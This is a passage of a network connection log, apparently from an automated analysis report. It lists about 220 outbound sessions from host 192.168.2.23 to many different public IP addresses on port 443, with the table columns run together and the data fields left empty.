                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21895192.168.2.234765083.34.79.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21896192.168.2.2333516172.169.176.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21897192.168.2.2345728171.40.87.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21898192.168.2.234381458.228.218.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21899192.168.2.235831488.54.61.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21900192.168.2.2337378141.88.184.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21901192.168.2.235776469.21.36.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21902192.168.2.2357296223.113.12.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21903192.168.2.234798476.198.77.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21904192.168.2.2354180195.105.4.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21905192.168.2.2353734126.233.59.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21906192.168.2.2354828207.15.127.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21907192.168.2.2335186195.60.117.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21908192.168.2.2359832144.153.8.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21909192.168.2.2356522192.235.233.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21910192.168.2.233488431.27.234.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21911192.168.2.2346856166.191.244.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21912192.168.2.2354112103.5.125.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21913192.168.2.2343930129.124.81.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21914192.168.2.2345390139.192.137.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21915192.168.2.234597232.127.15.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21916192.168.2.2348060151.204.187.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21917192.168.2.234496275.119.0.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21918192.168.2.235197040.206.83.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21919192.168.2.233743451.10.175.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21920192.168.2.2350850191.43.176.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21921192.168.2.234258413.188.245.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21922192.168.2.2356626209.202.168.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21923192.168.2.233514440.108.246.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21924192.168.2.2348304172.80.204.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21925192.168.2.233857487.246.112.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21926192.168.2.2350000211.17.38.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21927192.168.2.2350918203.51.17.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21928192.168.2.233591287.228.148.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21929192.168.2.2339452148.31.88.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21930192.168.2.234995450.51.31.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21931192.168.2.2359106106.219.77.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21932192.168.2.2353380210.235.154.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21933192.168.2.2349582115.176.100.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21934192.168.2.235014849.215.188.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21935192.168.2.2343156100.25.53.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21936192.168.2.233640419.22.105.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21937192.168.2.2343906210.198.242.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21938192.168.2.234239888.125.253.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21939192.168.2.2339326183.74.143.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21940192.168.2.235519624.136.219.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21941192.168.2.235663445.171.17.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21942192.168.2.2355602197.27.201.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21943192.168.2.2343760180.33.182.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21944192.168.2.234801843.69.123.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21945192.168.2.234534444.130.41.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21946192.168.2.2339948121.73.210.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21947192.168.2.2337288196.38.59.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21948192.168.2.2360192163.127.187.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21949192.168.2.2360820122.0.3.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21950192.168.2.233766094.65.133.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21951192.168.2.233988649.228.101.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21952192.168.2.2340902207.157.170.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21953192.168.2.2353580163.183.59.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21954192.168.2.235378295.40.75.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21955192.168.2.2334406182.54.88.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21956192.168.2.2356566155.175.120.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21957192.168.2.2357156207.234.69.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21958192.168.2.2344148147.209.82.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21959192.168.2.233439663.40.129.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21960192.168.2.234352095.47.88.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21961192.168.2.235506484.164.104.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21962192.168.2.235354045.120.67.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21963192.168.2.2349664146.37.62.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21964192.168.2.2349474143.5.5.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21965192.168.2.2350264165.65.49.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21966192.168.2.234765872.116.229.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21967192.168.2.2358940161.100.252.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21968192.168.2.235572244.22.68.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21969192.168.2.2348296165.127.122.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21970192.168.2.2335156187.177.167.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21971192.168.2.2354034175.248.53.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21972192.168.2.2348974175.152.101.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21973192.168.2.23383362.52.8.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21974192.168.2.2335526216.9.247.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21975192.168.2.235360417.121.34.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21976192.168.2.23408302.195.89.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21977192.168.2.235446442.36.124.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21978192.168.2.2340748152.209.191.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21979192.168.2.235761025.63.243.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21980192.168.2.2332882134.20.154.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21981192.168.2.2341120103.93.141.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21982192.168.2.2335230129.122.236.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21983192.168.2.233909036.168.151.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21984192.168.2.2348308112.234.28.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21985192.168.2.234170823.223.126.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21986192.168.2.2357546112.45.134.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21987192.168.2.23507681.118.22.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21988192.168.2.2340158101.26.79.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21989192.168.2.2342990101.52.224.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21990192.168.2.234675445.215.139.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21991192.168.2.2348696116.201.118.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21992192.168.2.234112038.78.219.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21993192.168.2.235154259.210.24.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21994192.168.2.2351280216.90.31.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21995192.168.2.2348248139.223.225.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21996192.168.2.2351678194.83.120.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21997192.168.2.2345080116.40.99.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21998192.168.2.234077480.86.223.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21999192.168.2.2352650134.188.42.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22000192.168.2.2358710219.14.179.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22001192.168.2.234767073.54.105.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22002192.168.2.2356348190.180.182.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22003192.168.2.234100213.44.148.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22004192.168.2.2346692221.100.116.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22005192.168.2.235463287.129.83.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22006192.168.2.2357888221.170.3.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22007192.168.2.235971424.70.45.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22008192.168.2.2358758219.180.239.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22009192.168.2.2338230114.129.115.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22010192.168.2.235795864.73.103.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22011192.168.2.2356720197.50.224.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22012192.168.2.2355562105.165.115.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22013192.168.2.233924690.135.249.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22014192.168.2.2344150118.238.188.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22015192.168.2.233861890.231.134.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22016192.168.2.2342852188.189.172.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22017192.168.2.235169053.178.151.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22018192.168.2.2360112162.75.164.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22019192.168.2.2359544154.213.64.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22020192.168.2.234993237.31.224.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22021192.168.2.233383064.244.185.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22022192.168.2.2351712219.242.57.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22023192.168.2.2360004152.145.17.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22024192.168.2.23469185.236.112.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22025192.168.2.2332956178.75.250.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22026192.168.2.2345472121.171.88.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22027192.168.2.2341698106.227.213.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22028192.168.2.2347910122.116.48.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22029192.168.2.2345226201.184.225.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22030192.168.2.234722853.68.164.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22031192.168.2.233870661.3.119.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22032192.168.2.2338468174.22.252.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22033192.168.2.234997063.230.69.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22034192.168.2.2357226177.172.228.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22035192.168.2.2336076177.204.142.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22036192.168.2.2357632114.41.224.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22037192.168.2.2336272219.200.210.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22038192.168.2.2334342217.140.15.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22039192.168.2.2345168173.27.253.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22040192.168.2.2353068125.98.150.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22041192.168.2.233764899.136.188.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22042192.168.2.2336764175.13.174.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22043192.168.2.234977661.50.148.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22044192.168.2.2356086140.218.64.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22045192.168.2.235369884.234.47.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22046192.168.2.236059448.246.123.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22047192.168.2.233915688.47.81.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22048192.168.2.2340576125.25.199.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22049192.168.2.2345500110.132.152.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22050192.168.2.2337762217.192.136.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22051192.168.2.2342084109.174.204.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22052192.168.2.2337932208.56.110.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22053192.168.2.233693874.18.37.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22054192.168.2.2336642206.204.131.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22055192.168.2.235080489.91.226.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22056192.168.2.2339320171.193.234.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22057192.168.2.234766253.222.1.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22058192.168.2.233998081.63.203.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22059192.168.2.2356516183.149.246.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22060192.168.2.2348478115.171.177.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22061192.168.2.235379834.61.251.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22062192.168.2.235960823.82.246.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22063192.168.2.2347318116.136.3.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22064192.168.2.2334382121.114.237.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22065192.168.2.2336804208.236.68.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22066192.168.2.2342072160.100.58.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22067192.168.2.2342976211.146.27.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22068192.168.2.2359282193.116.220.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22069192.168.2.2342916207.94.176.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22070192.168.2.2354350218.141.52.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22071192.168.2.2360358119.22.140.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22072192.168.2.234587846.231.173.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22073192.168.2.2333990166.156.151.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22074192.168.2.2350536128.84.42.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22075192.168.2.2354480117.29.92.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22076192.168.2.2355382135.67.21.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22077192.168.2.235202877.32.119.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22078192.168.2.233844876.47.55.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22079192.168.2.2339322161.55.5.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22080192.168.2.234101466.37.40.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22081192.168.2.23370582.229.30.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22082192.168.2.2338190220.61.181.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22083192.168.2.2346058212.145.168.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22084192.168.2.2349118110.108.60.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22085192.168.2.2349732212.152.115.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22086192.168.2.2333222122.109.188.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22087192.168.2.2350886125.250.139.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22088192.168.2.235968264.117.158.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22089192.168.2.2351904171.119.86.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22090192.168.2.2357104121.4.229.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22091192.168.2.2349354122.250.182.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22092192.168.2.234231427.102.147.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22093192.168.2.2333270123.52.171.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22094192.168.2.2356474204.189.171.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22095192.168.2.233453662.45.216.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22096192.168.2.234993879.88.0.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22097192.168.2.2350308121.164.142.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22098192.168.2.2360626134.137.242.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22099192.168.2.2344050134.30.91.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22100192.168.2.2352760118.88.153.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22101192.168.2.23567044.174.246.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22102192.168.2.2353398171.212.237.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22103192.168.2.2338574160.249.104.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22104192.168.2.23519029.65.15.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22105192.168.2.2349510194.99.24.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22106192.168.2.233606686.84.3.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22107192.168.2.234571259.116.244.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22108192.168.2.233686870.141.135.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22109192.168.2.2356918190.101.145.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22110192.168.2.2348814123.91.12.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22111192.168.2.235332052.134.231.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22112192.168.2.2351940188.38.154.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22113192.168.2.2338374119.145.155.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22114192.168.2.2345624131.25.248.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22115192.168.2.2360018190.31.196.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22116192.168.2.234918017.221.3.91443
